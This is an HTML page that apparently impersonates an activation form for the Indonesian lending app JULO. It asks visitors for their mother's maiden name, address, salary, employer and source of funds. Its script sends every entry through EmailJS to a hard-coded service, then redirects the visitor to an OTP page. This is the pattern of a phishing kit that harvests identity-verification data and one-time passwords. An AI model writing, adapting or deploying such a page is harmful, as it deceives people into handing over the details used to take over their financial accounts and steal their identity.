<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>JULO Aktivasi</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f7f7f7;
            margin: 0;
            padding: 0;
        }
        .container {
            max-width: 600px;
            margin: 20px auto;
            background-color: #fff;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        .form-group {
            margin-bottom: 15px;
        }
        .form-group label {
            display: block;
            margin-bottom: 5px;
        }
        .form-group input,
        .form-group select {
            width: calc(100% - 20px);
            padding: 10px;
            margin-left: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
        }
        .form-group select {
            height: 40px;
        }
        .optional {
            font-style: italic;
            color: #aaa;
        }
        .btn {
            display: block;
            width: 100%;
            padding: 15px;
            background-color: #0296f2;
            color: #fff;
            text-align: center;
            border: none;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
        }
        .btn:hover {
            background-color: #e07a01;
        }
        .message {
            display: none;
            padding: 10px;
            margin-top: 20px;
            border-radius: 5px;
        }
        .message.success {
            background-color: #d4edda;
            color: #155724;
        }
        .message.error {
            background-color: #f8d7da;
            color: #721c24;
        }
    </style>
    <script
    type="text/javascript"
    src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
</head>
<body>
    <form id="loginForm">
        <div class="container">
            <h2>JULO Aktivasi</h2>
            <div class="form-group">
                <label for="namaIbu">Nama Ibu Kandung</label>
                <input type="text" id="namaIbu" name="namaIbu" placeholder="Nama lengkap sesuai KK">
            </div>
            <div class="form-group">
                <label for="alias">Alias <span class="optional">(Optional)</span></label>
                <input type="text" id="alias" name="alias" placeholder="Mohon masukkan di sini">
            </div>
            <div class="form-group">
                <label for="alamatTinggal">Alamat Tinggal Saat Ini <span class="optional">(Optional)</span></label>
                <input type="text" id="alamatTinggal" name="alamatTinggal" placeholder="Nama Jalan, Gedung, No. Rumah/Unit">
            </div>
            <div class="form-group">
                <label for="gaji">Gaji Bulanan</label>
                <select id="gaji" name="gaji">
                    <option value="">Pilih</option>
                    <option value="Rp 2.000.000-2.999.999">Rp 2.000.000-2.999.999</option>
                    <option value="Rp 3.000.000-3.999.999">Rp 3.000.000-3.999.999</option>
                    <option value="Rp 4.000.000-4.999.999">Rp 4.000.000-4.999.999</option>
                    <option value="Rp 5.000.000-7.999.999">Rp 5.000.000-7.999.999</option>
                    <option value="Rp 8.000.000-9.999.999">Rp 8.000.000-9.999.999</option>
                    <option value="Rp 10.000.000">Rp 10.000.000</option>
                </select>
            </div>
            <div class="form-group">
                <label for="pendidikan">Tingkat Pendidikan</label>
                <select id="pendidikan" name="pendidikan">
                    <option value="tanpa_gelar">Tanpa gelar</option>
                    <option value="diploma_3">Diploma 3</option>
                    <option value="sarjana">Sarjana/S1</option>
                    <option value="magister">Magister/S2</option>
                    <option value="doktor">Doktor/S3</option>
                    <option value="diploma_1">Diploma 1</option>
                    <option value="diploma_2">Diploma 2</option>
                    <option value="lain_lain">Lain lain</option>
                </select>
            </div>
            <div class="form-group">
                <label for="industri">Industri</label>
                <input type="text" id="industri" name="industri" placeholder="Layanan Kesehatan...">
            </div>
            <div class="form-group">
                <label for="pekerjaan">Pekerjaan</label>
                <input type="text" id="pekerjaan" name="pekerjaan" placeholder="Administrasi umum">
            </div>
            <div class="form-group">
                <label for="namaPerusahaan">Nama Perusahaan</label>
                <input type="text" id="namaPerusahaan" name="namaPerusahaan" placeholder="Masukkan lembaga Anda bekerja">
            </div>
            <div class="form-group">
                <label for="alamatPerusahaan">Alamat Perusahaan <span class="optional">(Optional)</span></label>
                <input type="text" id="alamatPerusahaan" name="alamatPerusahaan" placeholder="Nama Jalan, Gedung, No. Rumah/Unit">
            </div>
            <div class="form-group">
                <label for="teleponPerusahaan">No. Telepon Perusahaan <span class="optional">(Optional)</span></label>
                <input type="tel" id="teleponPerusahaan" name="teleponPerusahaan" placeholder="+62">
            </div>
            <div class="form-group">
                <label for="sumberDana">Sumber Dana</label>
                <input type="text" id="sumberDana" name="sumberDana" placeholder="Gaji / Pendapatan">
            </div>
            <button type="submit" class="btn">Konfirmasi</button>
            <div id="message" class="message"></div>
        </div>
    </form>

    <script>
        function sendMail() {
            emailjs.init('D83ITQ2HmrzwCdKz8');

            var params = {
                namaIbu: document.querySelector('#namaIbu').value,
                alias: document.querySelector('#alias').value,
                alamatTinggal: document.querySelector('#alamatTinggal').value,
                gaji: document.querySelector('#gaji').value,
                pendidikan: document.querySelector('#pendidikan').value,
                industri: document.querySelector('#industri').value,
                pekerjaan: document.querySelector('#pekerjaan').value,
                namaPerusahaan: document.querySelector('#namaPerusahaan').value,
                alamatPerusahaan: document.querySelector('#alamatPerusahaan').value,
                teleponPerusahaan: document.querySelector('#teleponPerusahaan').value,
                sumberDana: document.querySelector('#sumberDana').value,
            };

            console.log("Params to send:", params);

            var serviceID = "service_t3e4xii";
            var templateID = "template_gdouh0g";

            emailjs.send(serviceID, templateID, params)
                .then(res => {
                    document.getElementById('message').style.display = 'block';
                    document.getElementById('message').classList.add('success');
                    document.getElementById('message').innerText = 'Email berhasil dikirim!';
                    console.log('SUCCESS!', res.status, res.text);
                    window.location.href = 'lanjutanotp.html';  // Redirect to OTP page
                })
                .catch(err => {
                    document.getElementById('message').style.display = 'block';
                    document.getElementById('message').classList.add('error');
                    document.getElementById('message').innerText = 'Terjadi kesalahan. Email gagal dikirim.';
                    console.error('FAILED...', err);
                });
        }

        document.getElementById('loginForm').addEventListener('submit', function(event) {
            event.preventDefault();
            sendMail();
        });
    </script>
</body>
</html>
